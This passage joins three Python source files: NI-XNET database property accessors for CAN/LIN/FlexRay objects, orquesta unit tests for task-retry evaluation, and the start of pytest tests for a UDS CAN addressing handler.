value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME,
value,
)
def get_signal_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME_UNIQUE_TO_CLUSTER,
)
def get_signal_num_bits(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_NUM_BITS,
)
def set_signal_num_bits(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_NUM_BITS,
value,
)
def get_signal_pdu_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_PDU_REF,
)
def get_signal_scale_fac(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_FAC,
)
def set_signal_scale_fac(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_FAC,
value,
)
def get_signal_scale_off(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_OFF,
)
def set_signal_scale_off(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_SCALE_OFF,
value,
)
def get_signal_start_bit(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_START_BIT,
)
def set_signal_start_bit(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_START_BIT,
value,
)
def get_signal_unit(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_UNIT,
)
def set_signal_unit(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_UNIT,
value,
)
def get_signal_mux_is_data_mux(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DATA_MUX,
)
def set_signal_mux_is_data_mux(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DATA_MUX,
value,
)
def get_signal_mux_is_dynamic(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_SIG_MUX_IS_DYNAMIC,
)
def get_signal_mux_value(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_MUX_VALUE,
)
def get_signal_mux_subfrm_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_MUX_SUBFRM_REF,
)
def get_subframe_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_CONFIG_STATUS,
)
def get_subframe_dyn_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_SUBFRM_DYN_SIG_REFS,
)
def get_subframe_frm_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SUBFRM_FRM_REF,
)
def get_subframe_mux_value(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_MUX_VALUE,
)
def set_subframe_mux_value(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SUBFRM_MUX_VALUE,
value,
)
def get_subframe_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME,
)
def set_subframe_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME,
value,
)
def get_subframe_pdu_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SUBFRM_PDU_REF,
)
def get_subframe_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SUBFRM_NAME_UNIQUE_TO_CLUSTER,
)
def get_ecu_clst_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_ECU_CLST_REF,
)
def get_ecu_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_ECU_COMMENT,
)
def set_ecu_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_ECU_COMMENT,
value,
)
def get_ecu_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_CONFIG_STATUS,
)
def get_ecu_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_ECU_NAME,
)
def set_ecu_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_ECU_NAME,
value,
)
def get_ecu_rx_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_RX_FRM_REFS,
)
def set_ecu_rx_frm_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_RX_FRM_REFS,
value,
)
def get_ecu_tx_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_TX_FRM_REFS,
)
def set_ecu_tx_frm_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_ECU_TX_FRM_REFS,
value,
)
def get_ecu_flex_ray_is_coldstart(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_IS_COLDSTART,
)
def get_ecu_flex_ray_startup_frame_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_STARTUP_FRAME_REF,
)
def get_ecu_flex_ray_wakeup_ptrn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_PTRN,
)
def set_ecu_flex_ray_wakeup_ptrn(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_PTRN,
value,
)
def get_ecu_flex_ray_wakeup_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_CHS,
)
def set_ecu_flex_ray_wakeup_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_WAKEUP_CHS,
value,
)
def get_ecu_flex_ray_connected_chs(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_CONNECTED_CHS,
)
def set_ecu_flex_ray_connected_chs(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_FLEX_RAY_CONNECTED_CHS,
value,
)
def get_ecu_lin_master(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_ECU_LIN_MASTER,
)
def set_ecu_lin_master(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_ECU_LIN_MASTER,
value,
)
def get_ecu_lin_protocol_ver(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_PROTOCOL_VER,
)
def set_ecu_lin_protocol_ver(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_PROTOCOL_VER,
value,
)
def get_ecu_lin_initial_nad(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_INITIAL_NAD,
)
def set_ecu_lin_initial_nad(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_INITIAL_NAD,
value,
)
def get_ecu_lin_config_nad(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_CONFIG_NAD,
)
def set_ecu_lin_config_nad(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_CONFIG_NAD,
value,
)
def get_ecu_lin_supplier_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_SUPPLIER_ID,
)
def set_ecu_lin_supplier_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_SUPPLIER_ID,
value,
)
def get_ecu_lin_function_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_FUNCTION_ID,
)
def set_ecu_lin_function_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_LIN_FUNCTION_ID,
value,
)
def get_ecu_lin_p2_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_P2_MIN,
)
def set_ecu_lin_p2_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_P2_MIN,
value,
)
def get_ecu_lin_st_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_ST_MIN,
)
def set_ecu_lin_st_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_ECU_LIN_ST_MIN,
value,
)
def get_ecu_j1939_preferred_address(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_ECU_J1939_PREFERRED_ADDRESS,
)
def set_ecu_j1939_preferred_address(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_ECU_J1939_PREFERRED_ADDRESS,
value,
)
def get_ecu_j1939_node_name(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_ECU_J1939_NODE_NAME,
)
def set_ecu_j1939_node_name(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_ECU_J1939_NODE_NAME,
value,
)
def get_lin_sched_clst_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_CLST_REF,
)
def get_lin_sched_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_COMMENT,
)
def set_lin_sched_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_COMMENT,
value,
)
def get_lin_sched_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_CONFIG_STATUS,
)
def get_lin_sched_entries(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRIES,
)
def get_lin_sched_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_NAME,
)
def set_lin_sched_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_NAME,
value,
)
def get_lin_sched_priority(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_PRIORITY,
)
def set_lin_sched_priority(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_PRIORITY,
value,
)
def get_lin_sched_run_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_RUN_MODE,
)
def set_lin_sched_run_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_RUN_MODE,
value,
)
def get_lin_sched_entry_collision_res_sched(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_COLLISION_RES_SCHED,
)
def set_lin_sched_entry_collision_res_sched(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_COLLISION_RES_SCHED,
value,
)
def get_lin_sched_entry_delay(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_DELAY,
)
def set_lin_sched_entry_delay(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_DELAY,
value,
)
def get_lin_sched_entry_event_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_EVENT_ID,
)
def set_lin_sched_entry_event_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_EVENT_ID,
value,
)
def get_lin_sched_entry_frames(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_FRAMES,
)
def set_lin_sched_entry_frames(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_FRAMES,
value,
)
def get_lin_sched_entry_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME,
)
def set_lin_sched_entry_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME,
value,
)
def get_lin_sched_entry_name_unique_to_cluster(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NAME_UNIQUE_TO_CLUSTER,
)
def get_lin_sched_entry_sched(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_SCHED,
)
def get_lin_sched_entry_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_TYPE,
)
def set_lin_sched_entry_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_TYPE,
value,
)
def get_lin_sched_entry_nc_ff_data_bytes(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NC_FF_DATA_BYTES,
)
def set_lin_sched_entry_nc_ff_data_bytes(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_LIN_SCHED_ENTRY_NC_FF_DATA_BYTES,
value,
)
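Every accessor above follows the same delegation pattern: a thin wrapper that forwards a database object reference plus a `_cconsts` property ID to a typed `_cprops` helper (`get_database_u32`, `set_database_string`, and so on). A minimal self-contained sketch of that pattern, using hypothetical stand-ins for both modules (the real helpers are not shown in this file):

```python
# Hypothetical stand-ins for _cconsts and _cprops, only to illustrate the
# delegation pattern; the property ID value below is made up.
class _FakeConsts(object):
    NX_PROP_FRM_ID = 0x10000001  # hypothetical property ID


class _FakeProps(object):
    def __init__(self):
        self._store = {}

    def set_database_u32(self, ref, prop_id, value):
        # Store the value under (object ref, property ID), as the real
        # helpers do against the C database session.
        self._store[(ref, prop_id)] = value

    def get_database_u32(self, ref, prop_id):
        return self._store[(ref, prop_id)]


_example_cconsts = _FakeConsts()
_example_cprops = _FakeProps()


def example_set_frame_id(ref, value):
    # type: (int, int) -> None
    _example_cprops.set_database_u32(ref, _example_cconsts.NX_PROP_FRM_ID, value)


def example_get_frame_id(ref):
    # type: (int) -> int
    return _example_cprops.get_database_u32(ref, _example_cconsts.NX_PROP_FRM_ID)
```

With these stand-ins, a set followed by a get round-trips the value, which is all the generated wrappers add on top of the typed helpers.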
# ---- orquesta/tests/unit/conducting/test_workflow_conductor_eval_retry.py (igcherkaev/orquesta, Apache-2.0) ----
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta import events
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorEvalTaskRetryTest(test_base.WorkflowConductorTest):
def test_no_task_retry(self):
wf_def = """
version: 1.0
description: A basic sequential workflow.
tasks:
task1:
action: core.noop
next:
- when: <% succeeded() %>
do: task2
task2:
action: core.noop
"""
# Setup workflow conductor.
spec = native_specs.WorkflowSpec(wf_def)
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Forward task1 from running to failed.
task_id = "task1"
route = 0
ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
conductor.update_task_state(task_id, route, ac_ex_event)
ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
conductor.update_task_state(task_id, route, ac_ex_event)
# Get task state for task1.
task_state_entry = conductor.get_task_state_entry(task_id, route)
# Set context for task1.
current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)
# Assert retry is false for task1.
self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))

    def test_retries_exhausted(self):
        wf_def = """
        version: 1.0

        description: A basic sequential workflow.

        tasks:
          task1:
            action: core.noop
            retry:
              count: 3
            next:
              - when: <% succeeded() %>
                do: task2
          task2:
            action: core.noop
        """

        # Setup workflow conductor.
        spec = native_specs.WorkflowSpec(wf_def)
        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Forward task1 from running to failed.
        task_id = "task1"
        route = 0
        ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
        conductor.update_task_state(task_id, route, ac_ex_event)
        ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
        conductor.update_task_state(task_id, route, ac_ex_event)

        # Get task state for task1 and mark the retries as exhausted.
        task_state_entry = conductor.get_task_state_entry(task_id, route)
        task_state_entry["retry"]["tally"] = 3

        # Set context for task1.
        current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)

        # Assert retry is false for task1.
        self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))

    def test_retry_default_condition_satisfied(self):
        wf_def = """
        version: 1.0

        description: A basic sequential workflow.

        tasks:
          task1:
            action: core.noop
            retry:
              count: 3
            next:
              - when: <% succeeded() %>
                do: task2
          task2:
            action: core.noop
        """

        # Setup workflow conductor.
        spec = native_specs.WorkflowSpec(wf_def)
        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Forward task1 from running to failed.
        task_id = "task1"
        route = 0
        ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
        conductor.update_task_state(task_id, route, ac_ex_event)
        ac_ex_event = events.ActionExecutionEvent(statuses.FAILED)
        conductor.update_task_state(task_id, route, ac_ex_event)

        # Get task state for task1.
        task_state_entry = conductor.get_task_state_entry(task_id, route)

        # Mock the task status.
        task_state_entry["status"] = statuses.FAILED

        # Set context for task1.
        current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)

        # Assert retry is true for task1.
        self.assertTrue(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))

    def test_retry_default_condition_not_satisfied(self):
        wf_def = """
        version: 1.0

        description: A basic sequential workflow.

        tasks:
          task1:
            action: core.noop
            retry:
              count: 3
            next:
              - when: <% succeeded() %>
                do: task2
          task2:
            action: core.noop
        """

        # Setup workflow conductor.
        spec = native_specs.WorkflowSpec(wf_def)
        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Forward task1 from running to succeeded.
        task_id = "task1"
        route = 0
        ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
        conductor.update_task_state(task_id, route, ac_ex_event)
        ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED)
        conductor.update_task_state(task_id, route, ac_ex_event)

        # Get task state for task1.
        task_state_entry = conductor.get_task_state_entry(task_id, route)

        # Set context for task1.
        current_task_ctx = conductor.make_task_context(task_state_entry, task_result=None)

        # Assert retry is false for task1.
        self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))

    def test_retry_given_condition_satisfied(self):
        wf_def = """
        version: 1.0

        description: A basic sequential workflow.

        tasks:
          task1:
            action: core.noop
            retry:
              when: <% result().status_code = 400 %>
              count: 3
            next:
              - when: <% succeeded() %>
                do: task2
          task2:
            action: core.noop
        """

        # Setup workflow conductor.
        spec = native_specs.WorkflowSpec(wf_def)
        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Forward task1 from running to succeeded.
        task_id = "task1"
        route = 0
        task_result = {"status_code": 400}
        ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
        conductor.update_task_state(task_id, route, ac_ex_event)
        ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED, result=task_result)
        conductor.update_task_state(task_id, route, ac_ex_event)

        # Get task state for task1.
        task_state_entry = conductor.get_task_state_entry(task_id, route)

        # Set context for task1.
        current_task_ctx = conductor.make_task_context(task_state_entry, task_result=task_result)

        # Assert retry is true for task1.
        self.assertTrue(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))

    def test_retry_given_condition_not_satisfied(self):
        wf_def = """
        version: 1.0

        description: A basic sequential workflow.

        tasks:
          task1:
            action: core.noop
            retry:
              when: <% result().status_code = 400 %>
              count: 3
            next:
              - when: <% succeeded() %>
                do: task2
          task2:
            action: core.noop
        """

        # Setup workflow conductor.
        spec = native_specs.WorkflowSpec(wf_def)
        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Forward task1 from running to succeeded.
        task_id = "task1"
        route = 0
        task_result = {"status_code": 200}
        ac_ex_event = events.ActionExecutionEvent(statuses.RUNNING)
        conductor.update_task_state(task_id, route, ac_ex_event)
        ac_ex_event = events.ActionExecutionEvent(statuses.SUCCEEDED, result=task_result)
        conductor.update_task_state(task_id, route, ac_ex_event)

        # Get task state for task1.
        task_state_entry = conductor.get_task_state_entry(task_id, route)

        # Set context for task1.
        current_task_ctx = conductor.make_task_context(task_state_entry, task_result=task_result)

        # Assert retry is false for task1.
        self.assertFalse(conductor._evaluate_task_retry(task_state_entry, current_task_ctx))


# tests/software_tests/can/test_addressing_information.py (from mdabrowski1990/uds, MIT license)
import pytest
from mock import patch, call, MagicMock, Mock

from uds.can.addressing_information import CanAddressingInformationHandler, \
    CanAddressingFormat, AddressingType, InconsistentArgumentsError, UnusedArgumentError


class TestCanAddressingInformationHandler:
    """Unit tests for `CanAddressingInformationHandler` class."""

    SCRIPT_LOCATION = "uds.can.addressing_information"

    def setup(self):
        self._patcher_validate_addressing_format = patch(f"{self.SCRIPT_LOCATION}.CanAddressingFormat.validate_member")
        self.mock_validate_addressing_format = self._patcher_validate_addressing_format.start()
        self._patcher_validate_addressing_type = patch(f"{self.SCRIPT_LOCATION}.AddressingType.validate_member")
        self.mock_validate_addressing_type = self._patcher_validate_addressing_type.start()
        self._patcher_can_id_handler_class = patch(f"{self.SCRIPT_LOCATION}.CanIdHandler")
        self.mock_can_id_handler_class = self._patcher_can_id_handler_class.start()
        self._patcher_validate_raw_byte = patch(f"{self.SCRIPT_LOCATION}.validate_raw_byte")
        self.mock_validate_raw_byte = self._patcher_validate_raw_byte.start()
        self._patcher_validate_raw_bytes = patch(f"{self.SCRIPT_LOCATION}.validate_raw_bytes")
        self.mock_validate_raw_bytes = self._patcher_validate_raw_bytes.start()

    def teardown(self):
        self._patcher_validate_addressing_format.stop()
        self._patcher_validate_addressing_type.stop()
        self._patcher_can_id_handler_class.stop()
        self._patcher_validate_raw_byte.stop()
        self._patcher_validate_raw_bytes.stop()

    # decode_ai

    @pytest.mark.parametrize("addressing_format, can_id, ai_data_bytes", [
        ("Some Format", "CAN ID", "some AI Data Bytes"),
        ("Another Format", 0x78D, []),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.decode_ai_data_bytes")
    def test_decode_ai(self, mock_decode_ai_data_bytes, addressing_format, can_id, ai_data_bytes):
        ai_values = CanAddressingInformationHandler.decode_ai(addressing_format=addressing_format,
                                                              can_id=can_id,
                                                              ai_data_bytes=ai_data_bytes)
        assert isinstance(ai_values, dict)
        assert set(ai_values.keys()) == {CanAddressingInformationHandler.ADDRESSING_TYPE_NAME,
                                         CanAddressingInformationHandler.TARGET_ADDRESS_NAME,
                                         CanAddressingInformationHandler.SOURCE_ADDRESS_NAME,
                                         CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME}
        self.mock_can_id_handler_class.decode_can_id.assert_called_once_with(addressing_format=addressing_format,
                                                                             can_id=can_id)
        mock_decode_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
                                                          ai_data_bytes=ai_data_bytes)

    # decode_ai_data_bytes

    @pytest.mark.parametrize("addressing_format", [None, "unknown addressing format"])
    @pytest.mark.parametrize("ai_data_bytes", [[], (0xFF,)])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
    def test_decode_ai_data_bytes__not_implemented(self, mock_validate_ai_data_bytes, addressing_format,
                                                   ai_data_bytes):
        with pytest.raises(NotImplementedError):
            CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
                                                                 ai_data_bytes=ai_data_bytes)
        mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
                                                            ai_data_bytes=ai_data_bytes)

    @pytest.mark.parametrize("addressing_format", [CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
                                                   CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
    @pytest.mark.parametrize("ai_data_bytes", [[], (0xCF,)])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
    def test_decode_ai_data_bytes__normal(self, mock_validate_ai_data_bytes, addressing_format, ai_data_bytes):
        decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
                                                                              ai_data_bytes=ai_data_bytes)
        assert isinstance(decoded_values, dict)
        assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
                                              CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
        assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] is None
        assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] is None
        mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
                                                            ai_data_bytes=ai_data_bytes)

    @pytest.mark.parametrize("ai_data_bytes", [[0x0A], (0xCF,)])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
    def test_decode_ai_data_bytes__extended(self, mock_validate_ai_data_bytes, ai_data_bytes):
        decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(
            addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING, ai_data_bytes=ai_data_bytes)
        assert isinstance(decoded_values, dict)
        assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
                                              CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
        assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] == ai_data_bytes[0]
